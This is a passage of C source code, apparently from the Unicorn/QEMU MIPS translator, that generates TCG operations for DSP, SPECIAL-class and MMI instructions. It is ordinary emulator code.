tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PACKRL_PH: check_dsp(ctx); gen_helper_packrl_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; } break; #ifdef TARGET_MIPS64 case OPC_CMPU_EQ_OB_DSP: switch (op2) { case OPC_CMP_EQ_PW: check_dsp(ctx); gen_helper_cmp_eq_pw(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_LT_PW: check_dsp(ctx); gen_helper_cmp_lt_pw(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_LE_PW: check_dsp(ctx); gen_helper_cmp_le_pw(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_EQ_QH: check_dsp(ctx); gen_helper_cmp_eq_qh(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_LT_QH: check_dsp(ctx); gen_helper_cmp_lt_qh(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_LE_QH: check_dsp(ctx); gen_helper_cmp_le_qh(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPGDU_EQ_OB: check_dsp_r2(ctx); gen_helper_cmpgdu_eq_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPGDU_LT_OB: check_dsp_r2(ctx); gen_helper_cmpgdu_lt_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPGDU_LE_OB: check_dsp_r2(ctx); gen_helper_cmpgdu_le_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPGU_EQ_OB: check_dsp(ctx); gen_helper_cmpgu_eq_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_CMPGU_LT_OB: check_dsp(ctx); gen_helper_cmpgu_lt_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_CMPGU_LE_OB: check_dsp(ctx); gen_helper_cmpgu_le_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_CMPU_EQ_OB: check_dsp(ctx); gen_helper_cmpu_eq_ob(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPU_LT_OB: check_dsp(ctx); gen_helper_cmpu_lt_ob(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPU_LE_OB: check_dsp(ctx); gen_helper_cmpu_le_ob(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PACKRL_PW: check_dsp(ctx); gen_helper_packrl_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PICK_OB: check_dsp(ctx); gen_helper_pick_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PICK_PW: check_dsp(ctx); gen_helper_pick_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PICK_QH: check_dsp(ctx); gen_helper_pick_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; } break; #endif } tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, v1_t); tcg_temp_free(tcg_ctx, v2_t); } static void gen_mipsdsp_append(CPUMIPSState *env, DisasContext *ctx, uint32_t op1, int rt, int rs, int sa) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; check_dsp_r2(ctx); if (rt == 0) { /* Treat as NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); switch (op1) { case OPC_APPEND_DSP: switch (MASK_APPEND(ctx->opcode)) { case OPC_APPEND: if (sa != 0) { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, tcg_ctx->cpu_gpr[rt], sa, 32 - sa); } tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); break; case OPC_PREPEND: if (sa != 0) { tcg_gen_ext32u_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], sa); tcg_gen_shli_tl(tcg_ctx, t0, t0, 32 - sa); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], t0); } tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); break; case OPC_BALIGN: sa &= 3; if (sa != 0 && sa != 2) { tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], 8 * sa); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_shri_tl(tcg_ctx, t0, t0, 8 * (4 - sa)); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], t0); } tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); break; default: /* Invalid */ MIPS_INVAL("MASK APPEND"); generate_exception_end(ctx, EXCP_RI); break; } break; #ifdef TARGET_MIPS64 case OPC_DAPPEND_DSP: switch (MASK_DAPPEND(ctx->opcode)) { case OPC_DAPPEND: if (sa != 0) { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, tcg_ctx->cpu_gpr[rt], sa, 64 - sa); } break; case OPC_PREPENDD: tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], 0x20 | sa); tcg_gen_shli_tl(tcg_ctx, t0, t0, 64 - (0x20 | sa)); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, t0); break; case OPC_PREPENDW: if (sa != 0) { tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], sa); tcg_gen_shli_tl(tcg_ctx, t0, t0, 64 - sa); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], t0); } break; case OPC_DBALIGN: sa &= 7; if (sa != 0 && sa != 2 && sa != 4) { tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], 8 * sa); tcg_gen_shri_tl(tcg_ctx, t0, t0, 8 * (8 - sa)); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], t0); } break; default: /* Invalid */ MIPS_INVAL("MASK DAPPEND"); generate_exception_end(ctx, EXCP_RI); break; } break; #endif } tcg_temp_free(tcg_ctx, t0); } static void gen_mipsdsp_accinsn(DisasContext *ctx, uint32_t op1, uint32_t op2, int ret, int v1, int v2, int check_ret) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv t1; TCGv v1_t; TCGv v2_t; int16_t imm; if ((ret == 0) && (check_ret == 1)) { /* Treat as NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); v1_t = tcg_temp_new(tcg_ctx); v2_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v1_t, v1); gen_load_gpr(tcg_ctx, v2_t, v2); switch (op1) { case OPC_EXTR_W_DSP: check_dsp(ctx); switch (op2) { case OPC_EXTR_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extr_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_EXTR_R_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extr_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_EXTR_RS_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extr_rs_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_EXTR_S_H: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extr_s_h(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_EXTRV_S_H: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_extr_s_h(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_EXTRV_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_extr_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_EXTRV_R_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_extr_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_EXTRV_RS_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_extr_rs_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_EXTP: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_EXTPV: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_extp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_EXTPDP: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extpdp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_EXTPDPV: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_extpdp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_SHILO: imm = (ctx->opcode >> 20) & 0x3F; tcg_gen_movi_tl(tcg_ctx, t0, ret); tcg_gen_movi_tl(tcg_ctx, t1, imm); gen_helper_shilo(tcg_ctx, t0, t1, tcg_ctx->cpu_env); break; case OPC_SHILOV: tcg_gen_movi_tl(tcg_ctx, t0, ret); gen_helper_shilo(tcg_ctx, t0, v1_t, tcg_ctx->cpu_env); break; case OPC_MTHLIP: tcg_gen_movi_tl(tcg_ctx, t0, ret); gen_helper_mthlip(tcg_ctx, t0, v1_t, tcg_ctx->cpu_env); break; case OPC_WRDSP: imm = (ctx->opcode >> 11) & 0x3FF; tcg_gen_movi_tl(tcg_ctx, t0, imm); gen_helper_wrdsp(tcg_ctx, v1_t, t0, tcg_ctx->cpu_env); break; case OPC_RDDSP: imm = (ctx->opcode >> 16) & 0x03FF; tcg_gen_movi_tl(tcg_ctx, t0, imm); gen_helper_rddsp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, tcg_ctx->cpu_env); break; } break; #ifdef TARGET_MIPS64 case OPC_DEXTR_W_DSP: check_dsp(ctx); switch (op2) { case OPC_DMTHLIP: tcg_gen_movi_tl(tcg_ctx, t0, ret); gen_helper_dmthlip(tcg_ctx, v1_t, t0, tcg_ctx->cpu_env); break; case OPC_DSHILO: { int shift = (ctx->opcode >> 19) & 0x7F; int ac = (ctx->opcode >> 11) & 0x03; tcg_gen_movi_tl(tcg_ctx, t0, shift); tcg_gen_movi_tl(tcg_ctx, t1, ac); gen_helper_dshilo(tcg_ctx, t0, t1, tcg_ctx->cpu_env); break; } case OPC_DSHILOV: { int ac = (ctx->opcode >> 11) & 0x03; tcg_gen_movi_tl(tcg_ctx, t0, ac); gen_helper_dshilo(tcg_ctx, v1_t, t0, tcg_ctx->cpu_env); break; } case OPC_DEXTP: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTPV: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTPDP: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextpdp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTPDPV: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextpdp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTR_L: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTR_R_L: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_r_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTR_RS_L: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_rs_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTR_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTR_R_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTR_RS_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_rs_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTR_S_H: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_s_h(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTRV_S_H: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_s_h(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTRV_L: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextr_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTRV_R_L: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextr_r_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTRV_RS_L: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextr_rs_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTRV_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextr_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTRV_R_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextr_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTRV_RS_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextr_rs_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; } break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, v1_t); tcg_temp_free(tcg_ctx, v2_t); } /* End MIPSDSP functions. */ static void decode_opc_special_r6(CPUMIPSState *env, DisasContext *ctx) { int rs, rt, rd, sa; uint32_t op1, op2; rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 6) & 0x1f; op1 = MASK_SPECIAL(ctx->opcode); switch (op1) { case OPC_LSA: gen_lsa(ctx, op1, rd, rs, rt, extract32(ctx->opcode, 6, 2)); break; case OPC_MULT: case OPC_MULTU: case OPC_DIV: case OPC_DIVU: op2 = MASK_R6_MULDIV(ctx->opcode); switch (op2) { case R6_OPC_MUL: case R6_OPC_MUH: case R6_OPC_MULU: case R6_OPC_MUHU: case R6_OPC_DIV: case R6_OPC_MOD: case R6_OPC_DIVU: case R6_OPC_MODU: gen_r6_muldiv(ctx, op2, rd, rs, rt); break; default: MIPS_INVAL("special_r6 muldiv"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_SELEQZ: case OPC_SELNEZ: gen_cond_move(ctx, op1, rd, rs, rt); break; case R6_OPC_CLO: case R6_OPC_CLZ: if (rt == 0 && sa == 1) { /* * Major opcode and function field is shared with preR6 MFHI/MTHI. * We need additionally to check other fields. */ gen_cl(ctx, op1, rd, rs); } else { generate_exception_end(ctx, EXCP_RI); } break; case R6_OPC_SDBBP: if (is_uhi(extract32(ctx->opcode, 6, 20))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { if (ctx->hflags & MIPS_HFLAG_SBRI) { generate_exception_end(ctx, EXCP_RI); } else { generate_exception_end(ctx, EXCP_DBp); } } break; #if defined(TARGET_MIPS64) case OPC_DLSA: check_mips_64(ctx); gen_lsa(ctx, op1, rd, rs, rt, extract32(ctx->opcode, 6, 2)); break; case R6_OPC_DCLO: case R6_OPC_DCLZ: if (rt == 0 && sa == 1) { /* * Major opcode and function field is shared with preR6 MFHI/MTHI. * We need additionally to check other fields. */ check_mips_64(ctx); gen_cl(ctx, op1, rd, rs); } else { generate_exception_end(ctx, EXCP_RI); } break; case OPC_DMULT: case OPC_DMULTU: case OPC_DDIV: case OPC_DDIVU: op2 = MASK_R6_MULDIV(ctx->opcode); switch (op2) { case R6_OPC_DMUL: case R6_OPC_DMUH: case R6_OPC_DMULU: case R6_OPC_DMUHU: case R6_OPC_DDIV: case R6_OPC_DMOD: case R6_OPC_DDIVU: case R6_OPC_DMODU: check_mips_64(ctx); gen_r6_muldiv(ctx, op2, rd, rs, rt); break; default: MIPS_INVAL("special_r6 muldiv"); generate_exception_end(ctx, EXCP_RI); break; } break; #endif default: /* Invalid */ MIPS_INVAL("special_r6"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_opc_special_tx79(CPUMIPSState *env, DisasContext *ctx) { int rs = extract32(ctx->opcode, 21, 5); int rt = extract32(ctx->opcode, 16, 5); int rd = extract32(ctx->opcode, 11, 5); uint32_t op1 = MASK_SPECIAL(ctx->opcode); switch (op1) { case OPC_MOVN: /* Conditional move */ case OPC_MOVZ: gen_cond_move(ctx, op1, rd, rs, rt); break; case OPC_MFHI: /* Move from HI/LO */ case OPC_MFLO: gen_HILO(ctx, op1, 0, rd); break; case OPC_MTHI: case OPC_MTLO: /* Move to HI/LO */ gen_HILO(ctx, op1, 0, rs); break; case OPC_MULT: case OPC_MULTU: gen_mul_txx9(ctx, op1, rd, rs, rt); break; case OPC_DIV: case OPC_DIVU: gen_muldiv(ctx, op1, 0, rs, rt); break; #if defined(TARGET_MIPS64) case OPC_DMULT: case OPC_DMULTU: case OPC_DDIV: case OPC_DDIVU: check_insn_opc_user_only(ctx, INSN_R5900); gen_muldiv(ctx, op1, 0, rs, rt); break; #endif case OPC_JR: gen_compute_branch(ctx, op1, 4, rs, 0, 0, 4); break; default: /* Invalid */ MIPS_INVAL("special_tx79"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_opc_special_legacy(CPUMIPSState *env, DisasContext *ctx) { int rs, rt, rd, sa; uint32_t op1; rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 6) & 0x1f; op1 = MASK_SPECIAL(ctx->opcode); switch (op1) { case OPC_MOVN: /* Conditional move */ case OPC_MOVZ: check_insn(ctx, ISA_MIPS4 | ISA_MIPS32 | INSN_LOONGSON2E | INSN_LOONGSON2F); gen_cond_move(ctx, op1, rd, rs, rt); break; case OPC_MFHI: /* Move from HI/LO */ case OPC_MFLO: gen_HILO(ctx, op1, rs & 3, rd); break; case OPC_MTHI: case OPC_MTLO: /* Move to HI/LO */ gen_HILO(ctx, op1, rd & 3, rs); break; case OPC_MOVCI: check_insn(ctx, ISA_MIPS4 | ISA_MIPS32); if (env->CP0_Config1 & (1 << CP0C1_FP)) { check_cp1_enabled(ctx); gen_movci(ctx, rd, rs, (ctx->opcode >> 18) & 0x7, (ctx->opcode >> 16) & 1); } else { generate_exception_err(ctx, EXCP_CpU, 1); } break; case OPC_MULT: case OPC_MULTU: if (sa) { check_insn(ctx, INSN_VR54XX); op1 = MASK_MUL_VR54XX(ctx->opcode); gen_mul_vr54xx(ctx, op1, rd, rs, rt); } else { gen_muldiv(ctx, op1, rd & 3, rs, rt); } break; case OPC_DIV: case OPC_DIVU: gen_muldiv(ctx, op1, 0, rs, rt); break; #if defined(TARGET_MIPS64) case OPC_DMULT: case OPC_DMULTU: case OPC_DDIV: case OPC_DDIVU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_muldiv(ctx, op1, 0, rs, rt); break; #endif case OPC_JR: gen_compute_branch(ctx, op1, 4, rs, rd, sa, 4); break; case OPC_SPIM: #ifdef MIPS_STRICT_STANDARD MIPS_INVAL("SPIM"); generate_exception_end(ctx, EXCP_RI); #else /* Implemented as RI exception for now. */ MIPS_INVAL("spim (unofficial)"); generate_exception_end(ctx, EXCP_RI); #endif break; default: /* Invalid */ MIPS_INVAL("special_legacy"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_opc_special(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs, rt, rd, sa; uint32_t op1; rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 6) & 0x1f; op1 = MASK_SPECIAL(ctx->opcode); switch (op1) { case OPC_SLL: /* Shift with immediate */ if (sa == 5 && rd == 0 && rs == 0 && rt == 0) { /* PAUSE */ if ((ctx->insn_flags & ISA_MIPS32R6) && (ctx->hflags & MIPS_HFLAG_BMASK)) { generate_exception_end(ctx, EXCP_RI); break; } } /* Fallthrough */ case OPC_SRA: gen_shift_imm(ctx, op1, rd, rt, sa); break; case OPC_SRL: switch ((ctx->opcode >> 21) & 0x1f) { case 1: /* rotr is decoded as srl on non-R2 CPUs */ if (ctx->insn_flags & ISA_MIPS32R2) { op1 = OPC_ROTR; } /* Fallthrough */ case 0: gen_shift_imm(ctx, op1, rd, rt, sa); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_ADD: case OPC_ADDU: case OPC_SUB: case OPC_SUBU: gen_arith(ctx, op1, rd, rs, rt); break; case OPC_SLLV: /* Shifts */ case OPC_SRAV: gen_shift(ctx, op1, rd, rs, rt); break; case OPC_SRLV: switch ((ctx->opcode >> 6) & 0x1f) { case 1: /* rotrv is decoded as srlv on non-R2 CPUs */ if (ctx->insn_flags & ISA_MIPS32R2) { op1 = OPC_ROTRV; } /* Fallthrough */ case 0: gen_shift(ctx, op1, rd, rs, rt); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_SLT: /* Set on less than */ case OPC_SLTU: gen_slt(ctx, op1, rd, rs, rt); break; case OPC_AND: /* Logic*/ case OPC_OR: case OPC_NOR: case OPC_XOR: gen_logic(ctx, op1, rd, rs, rt); break; case OPC_JALR: gen_compute_branch(ctx, op1, 4, rs, rd, sa, 4); break; case OPC_TGE: /* Traps */ case OPC_TGEU: case OPC_TLT: case OPC_TLTU: case OPC_TEQ: case OPC_TNE: check_insn(ctx, ISA_MIPS2); gen_trap(ctx, op1, rs, rt, -1); break; case OPC_LSA: /* OPC_PMON */ if ((ctx->insn_flags & ISA_MIPS32R6) || (env->CP0_Config3 & (1 << CP0C3_MSAP))) { decode_opc_special_r6(env, ctx); } else { /* Pmon entry point, also R4010 selsl */ #ifdef MIPS_STRICT_STANDARD MIPS_INVAL("PMON / selsl"); generate_exception_end(ctx, EXCP_RI); #else gen_helper_0e0i(pmon, sa); #endif } break; case OPC_SYSCALL: generate_exception_end(ctx, EXCP_SYSCALL); break; case OPC_BREAK: generate_exception_end(ctx, EXCP_BREAK); break; case OPC_SYNC: check_insn(ctx, ISA_MIPS2); gen_sync(tcg_ctx, extract32(ctx->opcode, 6, 5)); break; #if defined(TARGET_MIPS64) /* MIPS64 specific opcodes */ case OPC_DSLL: case OPC_DSRA: case OPC_DSLL32: case OPC_DSRA32: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift_imm(ctx, op1, rd, rt, sa); break; case OPC_DSRL: switch ((ctx->opcode >> 21) & 0x1f) { case 1: /* drotr is decoded as dsrl on non-R2 CPUs */ if (ctx->insn_flags & ISA_MIPS32R2) { op1 = OPC_DROTR; } /* Fallthrough */ case 0: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift_imm(ctx, op1, rd, rt, sa); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_DSRL32: switch ((ctx->opcode >> 21) & 0x1f) { case 1: /* drotr32 is decoded as dsrl32 on non-R2 CPUs */ if (ctx->insn_flags & ISA_MIPS32R2) { op1 = OPC_DROTR32; } /* Fallthrough */ case 0: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift_imm(ctx, op1, rd, rt, sa); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_DADD: case OPC_DADDU: case OPC_DSUB: case OPC_DSUBU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_arith(ctx, op1, rd, rs, rt); break; case OPC_DSLLV: case OPC_DSRAV: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift(ctx, op1, rd, rs, rt); break; case OPC_DSRLV: switch ((ctx->opcode >> 6) & 0x1f) { case 1: /* drotrv is decoded as dsrlv on non-R2 CPUs */ if (ctx->insn_flags & ISA_MIPS32R2) { op1 = OPC_DROTRV; } /* Fallthrough */ case 0: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift(ctx, op1, rd, rs, rt); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_DLSA: if ((ctx->insn_flags & ISA_MIPS32R6) || (env->CP0_Config3 & (1 << CP0C3_MSAP))) { decode_opc_special_r6(env, ctx); } break; #endif default: if (ctx->insn_flags & ISA_MIPS32R6) { decode_opc_special_r6(env, ctx); } else if (ctx->insn_flags & INSN_R5900) { decode_opc_special_tx79(env, ctx); } else { decode_opc_special_legacy(env, ctx); } } } #if defined(TARGET_MIPS64) /* * * MMI (MultiMedia Interface) ASE instructions * =========================================== */ /* * MMI instructions category: data communication * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * PCPYH PEXCH PEXTLB PINTH PPACB PEXT5 PREVH * PCPYLD PEXCW PEXTLH PINTEH PPACH PPAC5 PROT3W * PCPYUD PEXEH PEXTLW PPACW * PEXEW PEXTUB * PEXTUH * PEXTUW */ /* * PCPYH rd, rt * * Parallel Copy Halfword * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---------+---------+-----------+ * | MMI |0 0 0 0 0| rt | rd | PCPYH | MMI3 | * +-----------+---------+---------+---------+---------+-----------+ */ static void gen_mmi_pcpyh(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pd, rt, rd; uint32_t opcode; opcode = ctx->opcode; pd = extract32(opcode, 21, 5); rt = extract32(opcode, 16, 5); rd = extract32(opcode, 11, 5); if (unlikely(pd != 0)) { generate_exception_end(ctx, EXCP_RI); } else if (rd == 0) { /* nop */ } else if (rt == 0) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_mmr[rd], 0); } else { TCGv_i64 t0 = tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new(tcg_ctx); uint64_t mask = (1ULL << 16) - 1; tcg_gen_andi_i64(tcg_ctx, t0, tcg_ctx->cpu_gpr[rt], mask); tcg_gen_movi_i64(tcg_ctx, t1, 0); 